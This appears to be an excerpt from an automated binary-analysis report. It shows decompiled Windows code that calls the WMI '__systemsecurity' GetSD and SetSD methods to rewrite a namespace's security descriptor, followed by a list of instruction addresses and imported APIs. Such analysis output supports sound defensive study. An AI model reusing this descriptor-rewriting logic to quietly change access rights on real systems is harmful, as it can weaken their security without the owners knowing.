											_t475 = _t475 + 4;
											_v48 = _t453;
											_v8 = 4;
											if(_t453 == 0) {
												_t453 = 0;
												__eflags = 0;
												_v24 = 0;
												L17:
												_v8 = 3;
												_v60 = _t453;
												if(_t453 == 0) {
													goto L53;
												} else {
													_v8 = 5;
													_t422 = _v28;
													_v32 = 0;
													_t355 =  *((intOrPtr*)( *_t422 + 0x4c))(_t422,  *_t453, 0,  &_v32, 0);
													_t423 = _v28;
													_t356 =  *((intOrPtr*)( *_t423 + 8))(_t423);
													if(_t355 < 0) {
														L27:
														_t463 = _v24;
													} else {
														_t424 = _v32;
														_v20 = 0;
														 *((intOrPtr*)( *_t424 + 0x3c))(_t424, 0,  &_v20);
														_t367 = _v32;
														 *((intOrPtr*)( *_t367 + 8))(_t367);
														_v64 = 0;
														_t369 = GetSecurityDescriptorLength(_v36);
														_v48 = _t369;
														_v68 = _t369;
														_t370 =  &_v68;
														__imp__#15(0x11, 1, _t370);
														_t464 = _t370;
														if(_t464 == 0) {
															L26:
															_t371 = _v20;
															_t356 =  *((intOrPtr*)( *_t371 + 8))(_t371);
															goto L27;
														} else {
															_t372 =  &_v40;
															_v40 = 0;
															__imp__#23(_t464, _t372);
															if(_t372 < 0) {
																goto L26;
															} else {
																E012CC800(_v40, _v36, _v48);
																_t475 = _t475 + 0xc;
																__imp__#24(_t464);
																__imp__#8( &_v84);
																_v8 = 6;
																_t427 = _v20;
																_push(0);
																_push( &_v84);
																_push(0);
																_v84 = 0x2003;
																_v76 = _t464;
																_push(L"SD");
																_push(_t427);
																if( *((intOrPtr*)( *_t427 + 0x14))() >= 0) {
																	_t463 = _v24;
																	_t428 = _v44;
																	_t379 =  *((intOrPtr*)( *_t428 + 0x60))(_t428,  *_t446,  *_t463, 0, 0, _v20, 0, 0);
																	__eflags = _t379;
																	if(_t379 < 0) {
																		E012A2070(L"\nPut failed, returned 0x%x", _t379);
																		_t475 = _t475 + 8;
																	}
																	_t356 =  &_v84;
																	__imp__#9(_t356);
																} else {
																	_t381 = _v20;
																	 *((intOrPtr*)( *_t381 + 8))(_t381);
																	_t463 = _v24;
																	_t356 =  &_v84;
																	__imp__#9(_t356);
																}
															}
														}
													}
													asm("lock xadd [esi+0x8], eax");
													if((_t356 | 0xffffffff) == 1) {
														_t359 =  *_t463;
														if(_t359 != 0) {
															 *__imp__#6(_t359);
															 *_t463 = 0;
														}
														_t360 =  *(_t463 + 4);
														if( *(_t463 + 4) != 0) {
															E012CAE58(_t360);
															_t475 = _t475 + 4;
															 *(_t463 + 4) = 0;
														}
														_push(0xc);
														E012CAE27(_t463);
														_t475 = _t475 + 8;
													}
													_t460 = _t463 | 0xffffffff;
													goto L35;
												}
											} else {
												 *(_t453 + 4) = 0;
												 *(_t453 + 8) = 1;
												__imp__#2(L"SetSD");
												 *_t453 = _t353;
												if(_t353 == 0) {
													goto L52;
												} else {
													goto L17;
												}
											}
										}
									}
								}
							} else {
								_t386[1] = 0;
								_t386[2] = 1;
								_t383 =  *_t453(L"__systemsecurity");
								 *_t386 = _t383;
								if(_t383 == 0) {
									goto L50;
								} else {
									goto L10;
								}
							}
						}
					} else {
						 *(_t446 + 4) = 0;
						 *(_t446 + 8) = 1;
						_t384 =  *_t453(L"__systemsecurity=@");
						 *_t446 = _t384;
						if(_t384 == 0) {
							E012CBEA0(0x8007000e);
							L49:
							E012CBEA0(0x8007000e);
							L50:
							E012CBEA0(0x8007000e);
							L51:
							E012CBEA0(0x8007000e);
							L52:
							E012CBEA0(0x8007000e);
							L53:
							E012CBEA0(0x8007000e);
							asm("int3");
							asm("int3");
							_push(_t466);
							_t468 = _t475;
							_push(0xffffffff);
							_push(0x12ec6d2);
							_push( *[fs:0x0]);
							_push(_t386);
							_push(_t453);
							_push(_t446);
							_t239 =  *0x1309018; // 0xedd8d3b4
							 *[fs:0x0] =  &_v108;
							_v140 = _t430;
							_v128 = _t394;
							_t454 = E012CAE5D(_t386, _t446, _t453, __eflags, 0xc, _t239 ^ _t468);
							_t477 = _t475 - 0x38 + 4;
							_v124 = _t454;
							_v100 = 0;
							_t388 = __imp__#2;
							__eflags = _t454;
							if(_t454 == 0) {
								_t454 = 0;
								__eflags = 0;
								goto L58;
							} else {
								 *(_t454 + 4) = 0;
								 *(_t454 + 8) = 1;
								_t336 =  *_t388(L"__systemsecurity=@");
								 *_t454 = _t336;
								__eflags = _t336;
								if(__eflags == 0) {
									E012CBEA0(0x8007000e);
									goto L102;
								} else {
									L58:
									_v12 = 0xffffffff;
									_v36 = _t454;
									__eflags = _t454;
									if(__eflags == 0) {
										L102:
										E012CBEA0(0x8007000e);
										goto L103;
									} else {
										_push(0xc);
										_v12 = 1;
										_t446 = E012CAE5D(_t388, _t446, _t454, __eflags);
										_t477 = _t477 + 4;
										_v28 = _t446;
										_v12 = 2;
										__eflags = _t446;
										if(_t446 == 0) {
											_t446 = 0;
											__eflags = 0;
											goto L63;
										} else {
											 *(_t446 + 4) = 0;
											 *(_t446 + 8) = 1;
											_t335 =  *_t388(L"GetSD");
											 *_t446 = _t335;
											__eflags = _t335;
											if(__eflags == 0) {
												L103:
												E012CBEA0(0x8007000e);
												goto L104;
											} else {
												L63:
												_v12 = 1;
												_v60 = _t446;
												__eflags = _t446;
												if(__eflags == 0) {
													L104:
													E012CBEA0(0x8007000e);
													goto L105;
												} else {
													_t430 =  &_v32;
													_v12 = 3;
													_t394 = _v40;
													_v32 = 0;
													_t300 =  *((intOrPtr*)( *_t394 + 0x60))(_t394,  *_t454,  *_t446, 0, 0, 0, _t430, 0);
													_v28 = _t300;
													__eflags = _t300;
													if(_t300 < 0) {
														L87:
														_t392 = _v28;
														goto L88;
													} else {
														__eflags = _v32;
														if(__eflags != 0) {
															_push(0xc);
															_t315 = E012CAE5D(_t388, _t446, _t454, __eflags);
															_t388 = _t315;
															_t477 = _t477 + 4;
															_v40 = _t388;
															_v12 = 4;
															__eflags = _t388;
															if(_t388 == 0) {
																_t388 = 0;
																__eflags = 0;
																goto L71;
															} else {
																 *(_t388 + 4) = 0;
																 *(_t388 + 8) = 1;
																__imp__#2(L"sd");
																 *_t388 = _t315;
																__eflags = _t315;
																if(__eflags == 0) {
																	L105:
																	E012CBEA0(0x8007000e);
																	goto L106;
																} else {
																	L71:
																	_v12 = 3;
																	_v40 = _t388;
																	__eflags = _t388;
																	if(__eflags == 0) {
																		L106:
																		E012CBEA0(0x8007000e);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t468);
																		_t469 = _t477;
																		_push(0xffffffff);
																		_push(0x12ec70d);
																		_push( *[fs:0x0]);
																		_t249 =  *0x1309018; // 0xedd8d3b4
																		_t250 = _t249 ^ _t469;
																		_v192 = _t250;
																		_push(_t388);
																		_push(_t454);
																		_push(_t446);
																		_push(_t250);
																		 *[fs:0x0] =  &_v188;
																		_v232 = _t430;
																		_v228 = _t394;
																		_v180 = 0;
																		_push(1);
																		_v180 = 1;
																		_t455 = E012C9DCB(0, _t446, _t454, __eflags);
																		_v240 = _t455;
																		_v180 = 2;
																		_v216 = 0;
																		__eflags = _v152 - 2;
																		_v216 = 0;
																		_t398 =  <  ? _v152 : 2;
																		__eflags = _v148 - 8;
																		_t255 =  >=  ? _v168 :  &_v168;
																		_v200 = 0;
																		_v196 = 7;
																		E012A1EE0(0,  &_v216, _t430, _t446, _t455,  >=  ? _v168 :  &_v168,  <  ? _v152 : 2);
																		_v180 = 3;
																		_push( &_v244);
																		_t258 = E01298900( &_v216, L"\\\\");
																		_t480 = _t477 - 0x44 + 8;
																		_v180 = 2;
																		_t432 = _v196;
																		__eflags = _t258;
																		_t390 = 0 | _t258 == 0x00000000;
																		__eflags = _t432 - 8;
																		if(_t432 < 8) {
																			L111:
																			_t259 = 0;
																			_v36 = 0;
																			_v32 = 7;
																			_v52 = 0;
																			_v16 = 0;
																			__eflags = _t455;
																			if(_t455 != 0) {
																				_t259 =  *((intOrPtr*)( *_t455 + 8))();
																				__eflags = 0;
																				if(0 != 0) {
																					_t433 =  *0x00000000;
																					_push(1);
																					_t259 =  *( *0x00000000)();
																				}
																			}
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L120:
																				_v60 = 0;
																				_v56 = 0;
																				__imp__CoInitialize(0);
																				_t447 = _t259;
																				__eflags = _t447;
																				if(_t447 >= 0) {
																					L123:
																					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 2, 0);
																					_t448 = _t259;
																					__eflags = _t448;
																					if(_t448 >= 0) {
																						L125:
																						_t260 =  &_v60;
																						__imp__CoCreateInstance(0x12ef698, 0, 1, 0x12ef6a8, _t260);
																						_t448 = _t260;
																						__eflags = _t448;
																						if(_t448 >= 0) {
																							__eflags = _a16 - 8;
																							_t269 =  >=  ? _v4 :  &_v4;
																							__imp__#4(_t269, _a12);
																							_t434 = _v60;
																							_t457 = _t269;
																							_t406 =  *_t434;
																							_t271 =  *((intOrPtr*)(_t406 + 0xc))(_t434, _t457, 0, 0, 0, 0, 0, 0,  &_v56);
																							_t448 = _t271;
																							__imp__#6(_t457);
																							__eflags = _t448;
																							if(_t448 >= 0) {
																								_t458 = _v56;
																								_t276 =  &_v76;
																								__imp__CoQueryProxyBlanket(_t458, _t276,  &_v92, 0,  &_v72,  &_v88, 0,  &_v84);
																								_t448 = _t276;
																								__eflags = _t448;
																								if(_t448 < 0) {
																									L129:
																									_t277 = _v56;
																									 *((intOrPtr*)( *_t277 + 8))(_t277);
																								} else {
																									__imp__CoSetProxyBlanket(_t458, 0xffffffff, 0xffffffff, 0xffffffff, _v72, 3, 0xffffffff, 0x800);
																									_t448 = _t276;
																									__eflags = _t448;
																									if(_t448 >= 0) {
																										__eflags = _v68;
																										_t435 = _v64;
																										if(_v68 != 0) {
																											E012C33E0(_t390, _v56,  *_t435, _t448, _t458);
																											goto L134;
																										} else {
																											_push(_t406);
																											L54();
																											_t448 = _t276;
																											_t480 = _t480 + 4;
																											__eflags = _t448;
																											if(_t448 == 0) {
																												L134:
																												_t280 = _v56;
																												 *((intOrPtr*)( *_t280 + 8))(_t280);
																												__eflags = _t390;
																												if(_t390 == 0) {
																													__imp__CoUninitialize();
																												}
																												_t448 = 0;
																												__eflags = 0;
																											} else {
																											}
																										}
																									} else {
																										goto L129;
																									}
																								}
																							}
																						}
																					} else {
																						__eflags = _t448 - 0x80010119;
																						if(_t448 == 0x80010119) {
																							goto L125;
																						}
																					}
																				} else {
																					__eflags = _t447 - 0x80010106;
																					if(_t447 == 0x80010106) {
																						_t390 = 1;
																						goto L123;
																					}
																				}
																				_t433 = _a16;
																				__eflags = _t433 - 8;
																				if(_t433 < 8) {
																					L141:
																					 *[fs:0x0] = _v24;
																					_pop(_t449);
																					_pop(_t456);
																					_pop(_t391);
																					__eflags = _v28 ^ _t469;
																					return E012CAE19(_t448, _t391, _v28 ^ _t469, _t433, _t449, _t456);
																				} else {
																					_t405 = _v4;
																					_t433 = 2 + _t433 * 2;
																					_t263 = _t405;
																					__eflags = _t433 - 0x1000;
																					if(_t433 < 0x1000) {
																						L140:
																						_push(_t433);
																						E012CAE27(_t405);
																						goto L141;
																					} else {
																						_t222 = _t405 - 4; // 0x2e33
																						_t405 =  *_t222;
																						_t433 = _t433 + 0x23;
																						__eflags = _t263 - _t405 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L144;
																						} else {
																							goto L140;
																						}
																					}
																				}
																			} else {
																				_t405 = _a12;
																				__eflags = 0x7ffffffe - _t405 - 4;
																				if(__eflags < 0) {
																					goto L143;
																				} else {
																					__eflags = _a16 - 8;
																					_t286 =  >=  ? _v4 :  &_v4;
																					E01299780( &_v52, _v68, _t405, L"\\\\.\\", 4,  >=  ? _v4 :  &_v4, _t405);
																					_t259 = E012982B0(_t390,  &_v4,  &_v52);
																					_t437 = _v32;
																					__eflags = _t437 - 8;
																					if(_t437 < 8) {
																						goto L120;
																					} else {
																						_t413 = _v52;
																						_t438 = 2 + _t437 * 2;
																						_t289 = _t413;
																						__eflags = _t438 - 0x1000;
																						if(_t438 < 0x1000) {
																							L119:
																							_push(_t438);
																							_t259 = E012CAE27(_t413);
																							_t480 = _t480 + 8;
																							goto L120;
																						} else {
																							_t405 =  *((intOrPtr*)(_t413 - 4));
																							_t433 = _t438 + 0x23;
																							__eflags = _t289 - _t405 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L144;
																							} else {
																								goto L119;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t416 = _v52;
																			_t433 = 2 + _t432 * 2;
																			_t293 = _t416;
																			__eflags = _t433 - 0x1000;
																			if(_t433 < 0x1000) {
																				L110:
																				_push(_t433);
																				E012CAE27(_t416);
																				_t480 = _t480 + 8;
																				goto L111;
																			} else {
																				_t405 =  *((intOrPtr*)(_t416 - 4));
																				_t433 = _t433 + 0x23;
																				__eflags = _t293 - _t405 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					E012CF35F(_t390, _t405, _t433, __eflags);
																					L143:
																					E012A1D70(_t405);
																					L144:
																					_t267 = E012CF35F(_t390, _t405, _t433, __eflags);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					__imp__#9(_t405);
																					return _t267;
																				} else {
																					goto L110;
																				}
																			}
																		}
																	} else {
																		__imp__#8( &_v76);
																		_v12 = 6;
																		_t419 = _v32;
																		_t318 =  *((intOrPtr*)( *_t419 + 0x10))(_t419,  *_t388, 0,  &_v76, 0, 0);
																		_v28 = _t318;
																		__eflags = _t318;
																		if(_t318 >= 0) {
																			__eflags = _v76 - 0x2011;
																			if(_v76 == 0x2011) {
																				_t327 = _v68;
																				_v36 = _t327;
																				__imp__#20(_t327, 1,  &_v48);
																				_v28 = _t327;
																				__eflags = _t327;
																				if(_t327 >= 0) {
																					_t328 =  &_v44;
																					__imp__#19(_v36, 1, _t328);
																					_v28 = _t328;
																					__eflags = _t328;
																					if(_t328 >= 0) {
																						_v40 = _v44 - _v48 + 1;
																						_t332 =  &_v56;
																						__imp__#23(_v36, _t332);
																						_v28 = _t332;
																						__eflags = _t332;
																						if(_t332 >= 0) {
																							_push(_v40);
																							_t333 = E012D4011();
																							_t477 = _t477 + 4;
																							 *_v52 = _t333;
																							__eflags = _t333;
																							if(_t333 != 0) {
																								E012CC800(_t333, _v56, _v40);
																								_t477 = _t477 + 0xc;
																								__imp__#24(_v36);
																								_v28 = 0;
																							} else {
																								_v28 = 8;
																							}
																						}
																					}
																				}
																			} else {
																				_v28 = 0xd;
																			}
																		}
																		_t319 =  &_v76;
																		__imp__#9(_t319);
																		asm("lock xadd [ebx+0x8], eax");
																		_t300 = (_t319 | 0xffffffff) - 1;
																		__eflags = _t300;
																		if(_t300 == 0) {
																			_t321 =  *_t388;
																			__eflags = _t321;
																			if(_t321 != 0) {
																				 *__imp__#6(_t321);
																				 *_t388 = 0;
																			}
																			_t322 =  *(_t388 + 4);
																			__eflags = _t322;
																			if(_t322 != 0) {
																				E012CAE58(_t322);
																				_t477 = _t477 + 4;
																				 *(_t388 + 4) = 0;
																			}
																			_push(0xc);
																			_t300 = E012CAE27(_t388);
																			_t477 = _t477 + 8;
																		}
																		goto L87;
																	}
																}
															}
														} else {
															_t392 = 0x65b;
															L88:
															asm("lock xadd [edi+0x8], eax");
															_t302 = (_t300 | 0xffffffff) - 1;
															__eflags = _t302;
															if(_t302 == 0) {
																_t312 =  *_t446;
																__eflags = _t312;
																if(_t312 != 0) {
																	__imp__#6(_t312);
																	 *_t446 = 0;
																}
																_t313 =  *(_t446 + 4);
																__eflags = _t313;
																if(_t313 != 0) {
																	E012CAE58(_t313);
																	_t477 = _t477 + 4;
																	 *(_t446 + 4) = 0;
																}
																_push(0xc);
																_t302 = E012CAE27(_t446);
																_t477 = _t477 + 8;
															}
															asm("lock xadd [esi+0x8], eax");
															__eflags = (_t302 | 0xffffffff) == 1;
															if((_t302 | 0xffffffff) == 1) {
																_t306 =  *_t454;
																__eflags = _t306;
																if(_t306 != 0) {
																	 *__imp__#6(_t306);
																	 *_t454 = 0;
																}
																_t307 =  *(_t454 + 4);
																__eflags = _t307;
																if(_t307 != 0) {
																	E012CAE58(_t307);
																	_t477 = _t477 + 4;
																	 *(_t454 + 4) = 0;
																}
																_push(0xc);
																E012CAE27(_t454);
															}
															 *[fs:0x0] = _v20;
															return _t392;
														}
													}
												}
											}
										}
									}
								}
							}
						} else {
							goto L5;
						}
					}
				}
			}







































































































































              0x012c33e0
              0x012c33e0
              0x012c33e0
              0x012c33e1
              0x012c33e3
              0x012c33e5
              0x012c33f0
              0x012c33f1
              0x012c33f4
              0x012c33f5
              0x012c33f6
              0x012c33f7
              0x012c33fe
              0x012c3402
              0x012c340a
              0x012c340d
              0x012c3411
              0x012c3417
              0x012c3419
              0x012c374e
              0x012c3753
              0x012c3761
              0x012c341f
              0x012c341f
              0x012c3421
              0x012c342d
              0x012c342f
              0x012c3432
              0x012c3435
              0x012c343c
              0x012c3444
              0x012c3467
              0x012c3467
              0x012c3469
              0x012c3469
              0x012c3470
              0x012c3473
              0x012c3475
              0x00000000
              0x012c347b
              0x012c347b
              0x012c347d
              0x012c3489
              0x012c348b
              0x012c348e
              0x012c3491
              0x012c3497
              0x012c34ba
              0x012c34ba
              0x012c34bc
              0x012c34bc
              0x012c34c0
              0x012c34c5
              0x00000000
              0x012c34cb
              0x012c34cb
              0x012c34ce
              0x012c34d8
              0x012c34e1
              0x012c34e4
              0x012c34e9
              0x012c36d1
              0x012c36d3
              0x012c36d9
              0x012c36db
              0x012c36df
              0x012c36e2
              0x012c36e8
              0x012c36e8
              0x012c36ee
              0x012c36f3
              0x012c36f6
              0x012c36fb
              0x012c36fe
              0x012c36fe
              0x012c3705
              0x012c3708
              0x012c370d
              0x012c370d
              0x012c3710
              0x012c3716
              0x012c3718
              0x012c371c
              0x012c3724
              0x012c3726
              0x012c3726
              0x012c372c
              0x012c3731
              0x012c3734
              0x012c3739
              0x012c373c
              0x012c373c
              0x012c3743
              0x012c3746
              0x012c374b
              0x00000000
              0x012c34ef
              0x012c34ef
              0x012c34f3
              0x00000000
              0x012c34f9
              0x012c34f9
              0x012c34fb
              0x012c3500
              0x012c3502
              0x012c3505
              0x012c3508
              0x012c350b
              0x012c3511
              0x012c3538
              0x012c3538
              0x012c353a
              0x012c353d
              0x012c353d
              0x012c3541
              0x012c3546
              0x00000000
              0x012c354c
              0x012c354c
              0x012c3553
              0x012c355b
              0x012c3567
              0x012c356a
              0x012c3572
              0x012c3577
              0x012c368a
              0x012c368a
              0x012c357d
              0x012c357d
              0x012c3584
              0x012c3590
              0x012c3593
              0x012c3599
              0x012c359f
              0x012c35a6
              0x012c35ac
              0x012c35af
              0x012c35b2
              0x012c35ba
              0x012c35c0
              0x012c35c4
              0x012c3681
              0x012c3681
              0x012c3687
              0x00000000
              0x012c35ca
              0x012c35ca
              0x012c35cd
              0x012c35d6
              0x012c35de
              0x00000000
              0x012c35e4
              0x012c35ed
              0x012c35f2
              0x012c35f6
              0x012c3600
              0x012c3606
              0x012c360d
              0x012c3615
              0x012c3617
              0x012c3618
              0x012c361a
              0x012c361e
              0x012c3623
              0x012c3628
              0x012c362e
              0x012c3648
              0x012c364b
              0x012c3660
              0x012c3663
              0x012c3665
              0x012c366d
              0x012c3672
              0x012c3672
              0x012c3675
              0x012c3679
              0x012c3630
              0x012c3630
              0x012c3636
              0x012c3639
              0x012c363c
              0x012c3640
              0x012c3640
              0x012c362e
              0x012c35de
              0x012c35c4
              0x012c3690
              0x012c3696
              0x012c3698
              0x012c369c
              0x012c36a4
              0x012c36a6
              0x012c36a6
              0x012c36ac
              0x012c36b1
              0x012c36b4
              0x012c36b9
              0x012c36bc
              0x012c36bc
              0x012c36c3
              0x012c36c6
              0x012c36cb
              0x012c36cb
              0x012c36ce
              0x00000000
              0x012c36ce
              0x012c3513
              0x012c3518
              0x012c351f
              0x012c3526
              0x012c352c
              0x012c3530
              0x00000000
              0x012c3536
              0x00000000
              0x012c3536
              0x012c3530
              0x012c3511
              0x012c34f3
              0x012c34e9
              0x012c3499
              0x012c349e
              0x012c34a5
              0x012c34ac
              0x012c34ae
              0x012c34b2
              0x00000000
              0x012c34b8
              0x00000000
              0x012c34b8
              0x012c34b2
              0x012c3497
              0x012c3446
              0x012c344b
              0x012c3452
              0x012c3459
              0x012c345b
              0x012c345f
              0x012c3767
              0x012c376c
              0x012c3771
              0x012c3776
              0x012c377b
              0x012c3780
              0x012c3785
              0x012c378a
              0x012c378f
              0x012c3794
              0x012c3799
              0x012c379e
              0x012c379f
              0x012c37a0
              0x012c37a1
              0x012c37a3
              0x012c37a5
              0x012c37b0
              0x012c37b4
              0x012c37b5
              0x012c37b6
              0x012c37b7
              0x012c37c2
              0x012c37c8
              0x012c37cb
              0x012c37d5
              0x012c37d7
              0x012c37da
              0x012c37dd
              0x012c37e4
              0x012c37ea
              0x012c37ec
              0x012c380f
              0x012c380f
              0x00000000
              0x012c37ee
              0x012c37f3
              0x012c37fa
              0x012c3801
              0x012c3803
              0x012c3805
              0x012c3807
              0x012c3ab6
              0x00000000
              0x012c380d
              0x012c3811
              0x012c3811
              0x012c3818
              0x012c381b
              0x012c381d
              0x012c3abb
              0x012c3ac0
              0x00000000
              0x012c3823
              0x012c3823
              0x012c3825
              0x012c3831
              0x012c3833
              0x012c3836
              0x012c3839
              0x012c383d
              0x012c383f
              0x012c3862
              0x012c3862
              0x00000000
              0x012c3841
              0x012c3846
              0x012c384d
              0x012c3854
              0x012c3856
              0x012c3858
              0x012c385a
              0x012c3ac5
              0x012c3aca
              0x00000000
              0x012c3860
              0x012c3864
              0x012c3864
              0x012c3868
              0x012c386b
              0x012c386d
              0x012c3acf
              0x012c3ad4
              0x00000000
              0x012c3873
              0x012c3875
              0x012c3878
              0x012c387c
              0x012c3888
              0x012c3894
              0x012c3897
              0x012c389a
              0x012c389c
              0x012c3a19
              0x012c3a19
              0x00000000
              0x012c38a2
              0x012c38a2
              0x012c38a6
              0x012c38b2
              0x012c38b4
              0x012c38b9
              0x012c38bb
              0x012c38be
              0x012c38c1
              0x012c38c5
              0x012c38c7
              0x012c38ee
              0x012c38ee
              0x00000000
              0x012c38c9
              0x012c38ce
              0x012c38d5
              0x012c38dc
              0x012c38e2
              0x012c38e4
              0x012c38e6
              0x012c3ad9
              0x012c3ade
              0x00000000
              0x012c38ec
              0x012c38f0
              0x012c38f0
              0x012c38f4
              0x012c38f7
              0x012c38f9
              0x012c3ae3
              0x012c3ae8
              0x012c3aed
              0x012c3aee
              0x012c3aef
              0x012c3af0
              0x012c3af1
              0x012c3af3
              0x012c3af5
              0x012c3b00
              0x012c3b04
              0x012c3b09
              0x012c3b0b
              0x012c3b0e
              0x012c3b0f
              0x012c3b10
              0x012c3b11
              0x012c3b15
              0x012c3b1b
              0x012c3b1e
              0x012c3b21
              0x012c3b2a
              0x012c3b2c
              0x012c3b35
              0x012c3b3a
              0x012c3b3d
              0x012c3b48
              0x012c3b4f
              0x012c3b52
              0x012c3b59
              0x012c3b5d
              0x012c3b62
              0x012c3b6a
              0x012c3b71
              0x012c3b78
              0x012c3b80
              0x012c3b84
              0x012c3b8d
              0x012c3b92
              0x012c3b95
              0x012c3b99
              0x012c3b9c
              0x012c3b9e
              0x012c3ba1
              0x012c3ba4
              0x012c3bd8
              0x012c3bd8
              0x012c3bda
              0x012c3be1
              0x012c3be8
              0x012c3bec
              0x012c3bef
              0x012c3bf1
              0x012c3bf7
              0x012c3bfa
              0x012c3bfc
              0x012c3bfe
              0x012c3c02
              0x012c3c04
              0x012c3c04
              0x012c3bfc
              0x012c3c06
              0x012c3c08
              0x012c3c83
              0x012c3c85
              0x012c3c8c
              0x012c3c93
              0x012c3c99
              0x012c3c9b
              0x012c3c9d
              0x012c3cad
              0x012c3cbf
              0x012c3cc5
              0x012c3cc7
              0x012c3cc9
              0x012c3cd7
              0x012c3cd7
              0x012c3ce9
              0x012c3cef
              0x012c3cf1
              0x012c3cf3
              0x012c3cf9
              0x012c3d03
              0x012c3d08
              0x012c3d0e
              0x012c3d11
              0x012c3d19
              0x012c3d27
              0x012c3d2b
              0x012c3d2d
              0x012c3d33
              0x012c3d35
              0x012c3d3b
              0x012c3d52
              0x012c3d57
              0x012c3d5d
              0x012c3d5f
              0x012c3d61
              0x012c3d82
              0x012c3d82
              0x012c3d88
              0x012c3d63
              0x012c3d76
              0x012c3d7c
              0x012c3d7e
              0x012c3d80
              0x012c3d8d
              0x012c3d91
              0x012c3d94
              0x012c3daf
              0x00000000
              0x012c3d96
              0x012c3d96
              0x012c3d9a
              0x012c3d9f
              0x012c3da1
              0x012c3da4
              0x012c3da6
              0x012c3db4
              0x012c3db4
              0x012c3dba
              0x012c3dbd
              0x012c3dbf
              0x012c3dc1
              0x012c3dc1
              0x012c3dc7
              0x012c3dc7
              0x00000000
              0x012c3da8
              0x012c3da6
              0x00000000
              0x00000000
              0x00000000
              0x012c3d80
              0x012c3d61
              0x012c3d35
              0x012c3ccb
              0x012c3ccb
              0x012c3cd1
              0x00000000
              0x00000000
              0x012c3cd1
              0x012c3c9f
              0x012c3c9f
              0x012c3ca5
              0x012c3cab
              0x00000000
              0x012c3cab
              0x012c3ca5
              0x012c3dc9
              0x012c3dcc
              0x012c3dcf
              0x012c3dff
              0x012c3e04
              0x012c3e0c
              0x012c3e0d
              0x012c3e0e
              0x012c3e12
              0x012c3e1c
              0x012c3dd1
              0x012c3dd1
              0x012c3dd4
              0x012c3ddb
              0x012c3ddd
              0x012c3de3
              0x012c3df5
              0x012c3df5
              0x012c3df7
              0x00000000
              0x012c3de5
              0x012c3de5
              0x012c3de5
              0x012c3de8
              0x012c3df0
              0x012c3df3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3df3
              0x012c3de3
              0x012c3c0a
              0x012c3c0a
              0x012c3c14
              0x012c3c17
              0x00000000
              0x012c3c1d
              0x012c3c1d
              0x012c3c25
              0x012c3c38
              0x012c3c44
              0x012c3c49
              0x012c3c4c
              0x012c3c4f
              0x00000000
              0x012c3c51
              0x012c3c51
              0x012c3c54
              0x012c3c5b
              0x012c3c5d
              0x012c3c63
              0x012c3c79
              0x012c3c79
              0x012c3c7b
              0x012c3c80
              0x00000000
              0x012c3c65
              0x012c3c65
              0x012c3c68
              0x012c3c70
              0x012c3c73
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3c73
              0x012c3c63
              0x012c3c4f
              0x012c3c17
              0x012c3ba6
              0x012c3ba6
              0x012c3ba9
              0x012c3bb0
              0x012c3bb2
              0x012c3bb8
              0x012c3bce
              0x012c3bce
              0x012c3bd0
              0x012c3bd5
              0x00000000
              0x012c3bba
              0x012c3bba
              0x012c3bbd
              0x012c3bc5
              0x012c3bc8
              0x012c3e1d
              0x012c3e22
              0x012c3e22
              0x012c3e27
              0x012c3e27
              0x012c3e2c
              0x012c3e2d
              0x012c3e2e
              0x012c3e2f
              0x012c3e31
              0x012c3e37
              0x00000000
              0x00000000
              0x00000000
              0x012c3bc8
              0x012c3bb8
              0x012c38ff
              0x012c3903
              0x012c390d
              0x012c3914
              0x012c391f
              0x012c3922
              0x012c3925
              0x012c3927
              0x012c3932
              0x012c3936
              0x012c3944
              0x012c394e
              0x012c3951
              0x012c3957
              0x012c395a
              0x012c395c
              0x012c395e
              0x012c3967
              0x012c396d
              0x012c3970
              0x012c3972
              0x012c397b
              0x012c397e
              0x012c3985
              0x012c398b
              0x012c398e
              0x012c3990
              0x012c3992
              0x012c3995
              0x012c399d
              0x012c39a0
              0x012c39a2
              0x012c39a4
              0x012c39b6
              0x012c39bb
              0x012c39c1
              0x012c39c7
              0x012c39a6
              0x012c39a6
              0x012c39a6
              0x012c39a4
              0x012c3990
              0x012c3972
              0x012c3938
              0x012c3938
              0x012c3938
              0x012c3936
              0x012c39ce
              0x012c39d2
              0x012c39db
              0x012c39e0
              0x012c39e0
              0x012c39e1
              0x012c39e3
              0x012c39e5
              0x012c39e7
              0x012c39ef
              0x012c39f1
              0x012c39f1
              0x012c39f7
              0x012c39fa
              0x012c39fc
              0x012c39ff
              0x012c3a04
              0x012c3a07
              0x012c3a07
              0x012c3a0e
              0x012c3a11
              0x012c3a16
              0x012c3a16
              0x00000000
              0x012c39e1
              0x012c38f9
              0x012c38e6
              0x012c38a8
              0x012c38a8
              0x012c3a1c
              0x012c3a1f
              0x012c3a24
              0x012c3a24
              0x012c3a25
              0x012c3a27
              0x012c3a29
              0x012c3a2b
              0x012c3a2e
              0x012c3a34
              0x012c3a34
              0x012c3a3a
              0x012c3a3d
              0x012c3a3f
              0x012c3a42
              0x012c3a47
              0x012c3a4a
              0x012c3a4a
              0x012c3a51
              0x012c3a54
              0x012c3a59
              0x012c3a59
              0x012c3a5f
              0x012c3a64
              0x012c3a65
              0x012c3a67
              0x012c3a69
              0x012c3a6b
              0x012c3a73
              0x012c3a75
              0x012c3a75
              0x012c3a7b
              0x012c3a7e
              0x012c3a80
              0x012c3a83
              0x012c3a88
              0x012c3a8b
              0x012c3a8b
              0x012c3a92
              0x012c3a95
              0x012c3a9a
              0x012c3aa2
              0x012c3ab0
              0x012c3ab0
              0x012c38a6
              0x012c389c
              0x012c386d
              0x012c385a
              0x012c383f
              0x012c381d
              0x012c3807
              0x012c3465
              0x00000000
              0x012c3465
              0x012c345f
              0x012c3444

              APIs
              • IsValidSecurityDescriptor.ADVAPI32(?,EDD8D3B4,00000000,00000000,00000000), ref: 012C3411
              • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 012C3459
              • SysAllocString.OLEAUT32(__systemsecurity), ref: 012C34AC
              • SysAllocString.OLEAUT32(SetSD), ref: 012C3526
